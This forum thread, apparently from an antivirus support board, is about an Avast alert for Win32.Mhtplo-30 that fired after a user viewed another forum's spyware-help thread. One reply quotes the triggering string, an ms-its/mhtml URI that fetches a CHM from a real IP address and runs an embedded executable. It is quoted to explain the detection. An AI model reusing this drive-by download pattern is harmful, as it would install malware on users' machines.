Wierd Avast Virus Alert Yesterday

[buttoni]

Recently I was on the Help2Go pc forum. http://www.help2go.com/component/option,com_forum/Itemid,32/page,viewforum/f,5/
(can't link you to the specific thread, because will set off Avast again, but it's the thread last week by author "needhelpnow" topic was "Internet Explorer and My Computer Folder won't open..........eeek!", if you'd like to try it yourself.)

I was casually reading some posts on their spyware help forum and not once, but TWICE (went back later to site and selected the post again to test my theory), when I clicked on one particular thread, Avast alerted a virus warning for Win32.Mhtplo-30 [Trj]in a Temporary Internet File.  Wouldn't let me move to chest or delete because "was in use by another process".  I clicked No Action.  As I had JUST cleaned out my TempIntFiles folder before going on line, I knew if it was a virus infection, it had JUST occurred.  Immediately disconnected and rebooted into safe mode and could not see a temp folder.  But did a complete scan with Avast and Ewido and found nothing!.  Went back into regular mode and could now see a TempIntFiles folder with the named file in it.  Did two scans again and nothing found.  Zipped said file up to Jotti and nothing found by any of their scanners.  Trend Micro Housecall found nothing.  Then I went to Help2Go site and posted the oddity for them to check into.  Their main spyware guy (not an Avast user) said HE could open the thread with no problem, but saw a line in the poster's HJT log that may have been what set off Avast because it was a "reference to a baddie."  The line was:

016 - DPF  {10003000-1000-0000-1000-000000000000}

He said it must have been a False Positive by Avast and not to worry and to just delete the file in the usual manner.  I have no bizarre, virus type symptoms, so I believe he is correct in saying it is an FP.  I'm new to Avast (under a month) and am surprised it is so sensitive that it sees references to baddies in HJT logs posted on forums I like to read?  Is Avast's database signature recognition for this particular virus not specific enough?

I don't guess I'll ever get to read that particular poster's thread on H2Go.   

[Lisandro]

When I clicked on one particular thread, Avast alerted a virus warning for Win32.Mhtplo-30 [Trj]in a Temporary Internet File.  Wouldn't let me move to chest or delete because "was in use by another process".  I clicked No Action.  As I had JUST cleaned out my TempIntFiles folder before going on line, I knew if it was a virus infection, it had JUST occurred.

Do you have WebShield enabled?

Immediately disconnected and rebooted into safe mode and could not see a temp folder.  But did a complete scan with Avast and Ewido and found nothing!.  Went back into regular mode and could now see a TempIntFiles folder with the named file in it.  Did two scans again and nothing found.

Well, the file could be 'created' by the worm AFTER the scannings. Recurring infections do this.

HE could open the thread with no problem, but saw a line in the poster's HJT log that may have been what set off Avast because it was a "reference to a baddie."

Does HE use avast? Only WebShield could caught the infection on-the-fly, BEFORE the file is saved in the disk.
Are you sure that meanwhile, the thread at that page was not changed (modified, the link to infection excluded, etc.)?

I'm new to Avast (under a month) and am surprised it is so sensitive that it sees references to baddies in HJT logs posted on forums I like to read?  Is Avast's database signature recognition for this particular virus not specific enough?

Could be a false positive but the behavior of avast is that sensitive... WebShield scans the internet traffic before it's saved as files in your computer.

[Delta]

Hi,

ms-its:mhtml:file://C:\foo.mht! http: //195.225.177.13/20 647/online.chm::/on-line.exe

It is this piece that causes the problem. I've added spaces to stop it being detected and stop the IP address becoming clickable

On my computer Avast will detect it regardless of whether WebShield is on or off.

[buttoni]

Yes, Tech, I have Web Shield "running".  As to what AV the other forum mod uses, I'm not sure, but I don't think it's Avast, or I think he would have said so.  On numerous occasions, mods on that forum have recommend AVG, indicating many of them use it and have experienced few problems with it.  I checked today and the named file has not been recreated and I have no problems with my pc.  So I don't think it was an infection.

[buttoni]

Delta, I'm glad to hear it's not just my Avast settings and you got the same reaction to the thread I did.  Did it create the Temporary Internet File shown in red below for you, too?  I will continue to assume it's a false positive as the other forum mod indicated unless I get some indication of unusual behavior on my pc. 

Tech, Delta's experience would indicate you can go to the site in my link, click the thread mentioned above to recreate the same Temporary Internet File if Avast expert wants to study further:

created filename 34FQPUI2\t,19110[1].htm

So far, said file has not recreated today.  Will continue to do search for it for awhile, though, and also be on the lookout for any unusual pc behavior.

[Delta]

Hi,

the file name was t,19100[1].htm.

I wouldn't worry about it; it is an obvious FP